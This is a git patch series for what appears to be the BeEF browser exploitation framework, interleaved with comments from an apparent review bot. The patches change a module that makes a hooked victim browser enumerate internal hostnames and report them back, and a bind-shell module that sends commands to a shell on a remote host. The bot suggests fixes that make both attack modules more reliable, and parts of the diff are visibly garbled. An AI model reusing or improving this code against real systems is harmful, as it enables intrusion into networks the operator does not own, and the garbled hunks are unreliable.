From e95c74b5e159f4b96d7f4406e212a797969c398a Mon Sep 17 00:00:00 2001
From: Nbblrr
Date: Fri, 28 Jun 2013 14:33:33 +0200
Subject: [PATCH 1/3] DNS Enumeration module does not consider the user timeout parameter
---
 modules/network/dns_enumeration/command.js | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)
diff --git a/modules/network/dns_enumeration/command.js b/modules/network/dns_enumeration/command.js
index cd7397570..172a34c2d 100644
--- a/modules/network/dns_enumeration/command.js
+++ b/modules/network/dns_enumeration/command.js
@@ -9,26 +9,26 @@ beef.execute(function() { var dns_list = "<%= @dns_list %>"; var timeout = parseInt("<%= @timeout %>"); - var cont=0; + var cont=0; var port = 900; var protocol="http://"; var hostnames; if(dns_list!="%default%") { - hostnames = dns_list.split(","); + hostnames = dns_list.split(","); } else { hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml"); } - + function notify() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Internal DNS found: '+ hostnames[cont]); check_next(); } - - function check_next() { + + function check_next() { cont++; - if(cont', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); + if(cont', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); } function do_resolv(url) { 
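Review bot: `hostnames = dns_list.split(",")` on the new side uses the operator-supplied list verbatim, so an entry written with surrounding whitespace (`www, mail`) becomes ` mail` and is probed as `http:// mail:900`, and an empty non-`%default%` list yields `[""]` and a single probe of `http://:900`. Stripping whitespace before splitting and dropping empty entries avoids both; in a hooked browser of this era I would stay away from `String.prototype.trim` and use `hostnames = dns_list.replace(/\s+/g, "").split(",");` followed by a short loop that skips empty strings before the enumeration starts. The `if(cont` line in this hunk is garbled in this copy of the patch, so I cannot review what changed there. The enclosing `beef.execute(function() {` callback starts before this hunk.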
@@ -42,15 +42,15 @@ beef.execute(function() { } else { return -1; } - + xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } }; xhr.send(); - var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, 4000); + var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, timeout); } beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Starting DNS enumeration: '+ hostnames.length + ' hostnames loaded'); if(do_resolv(protocol + hostnames[0] + ":" + port)==-1) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); } }); From 164ff5bea629e520e281ff025528ed4c43b21fe6 Mon Sep 17 00:00:00 2001 From: bmantra Date: Fri, 28 Jun 2013 20:42:53 +0200 Subject: [PATCH 2/3] added option for LF only, to use with Linux --- modules/exploits/beefbind/beef_bind_shell/command.js | 7 ++++++- modules/exploits/beefbind/beef_bind_shell/module.rb | 6 +++++- 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js index da6d040f0..afd6b8256 100755 --- a/modules/exploits/beefbind/beef_bind_shell/command.js +++ b/modules/exploits/beefbind/beef_bind_shell/command.js @@ -9,6 +9,7 @@ beef.execute(function () { var rport = '<%= @rport %>'; var path = '<%= @path %>'; var cmd = '<%= @cmd %>'; + var shellcode ='<%= @shellcode %>'; var uri = "http://" + rhost + ":" + rport + path; 
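Review bot: `setTimeout(..., timeout)` at the end of do_resolv now trusts the operator-supplied value, and `timeout` is produced by `parseInt("<%= @timeout %>")` with no radix, so an empty or non-numeric option becomes NaN; a NaN or 0 delay is treated as 0 and the timer almost certainly fires before the XHR reaches readyState 4, at which point `notify()` reports every hostname as 'Internal DNS found'. Keep the old 4000 ms as the fallback when the value is unusable: `var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, (timeout > 0) ? timeout : 4000);` (NaN > 0 is false, so it is covered), and pass the radix, `parseInt("<%= @timeout %>", 10)`, where the variable is declared. do_resolv starts before this hunk, which ends at the close of the beef.execute callback.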
@@ -73,7 +74,11 @@ beef.execute(function () { }; xhr.open("POST", uri, false); xhr.setRequestHeader("Content-Type", "text/plain"); - command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?" + if (shellcode == 'Linux'){ + command = "cmd=" + command + "\n"; // very important only LF + }else{ + command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?" + } xhr.send(command); setTimeout("get_additional_cmd_results()",500); }; diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb index 5eac5a4a0..dc84c3c03 100755 --- a/modules/exploits/beefbind/beef_bind_shell/module.rb +++ b/modules/exploits/beefbind/beef_bind_shell/module.rb @@ -10,7 +10,11 @@ class Beef_bind_shell < BeEF::Core::Command { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'}, { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'}, { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'}, - { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'} + { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}, + { 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore', + 'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']], + 'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true + } ] end From e61b26692145486d7f9a7836d6c4d455be81a375 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 1 Jul 2013 00:42:47 +0930 Subject: [PATCH 3/3] update version --- VERSION | 2 +- config.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/VERSION b/VERSION index 1c48bbad1..11ac0da8e 100644 --- a/VERSION +++ b/VERSION @@ -4,4 +4,4 @@ # See the file 'doc/COPYING' for copying permission # -0.4.4.6-alpha +0.4.4.7-alpha diff --git a/config.yaml b/config.yaml index 54728de0d..a70f427f2 100644 
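Review bot: The new branch duplicates the `"cmd=" + command + ...` concatenation and uses loose equality, so anything other than the exact string 'Linux' silently takes the CRLF path; that is a sensible default but it should be visible in one place rather than spread over an if/else. Compute the terminator once and keep the why-comment with it: `var eol = (shellcode === 'Linux') ? "\n" : "\r\n"; // Windows cmd.exe answers a bare LF with "More?"` followed by `command = "cmd=" + command + eol;`. The local named `shellcode` holds the target OS picked in the combobox, not shellcode; `target_os` would say what it is. The function enclosing this hunk starts before it.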
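Review bot: The new 'shellcode' combobox declares no 'value' while every other option in this array does, so the option is unset until the operator picks an entry; if the framework then renders `@shellcode` as an empty string, command.js falls through to the CRLF branch with nothing in the UI indicating that Windows was assumed. Make the default explicit with `'value' => 'Windows',` after 'name' (matching the first store_data entry) so the UI state and the `shellcode == 'Linux'` comparison in command.js agree. The method that returns this array starts before the hunk.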
--- a/config.yaml +++ b/config.yaml @@ -6,7 +6,7 @@ # BeEF Configuration file beef: - version: '0.4.4.6-alpha' + version: '0.4.4.7-alpha' debug: false restrictions: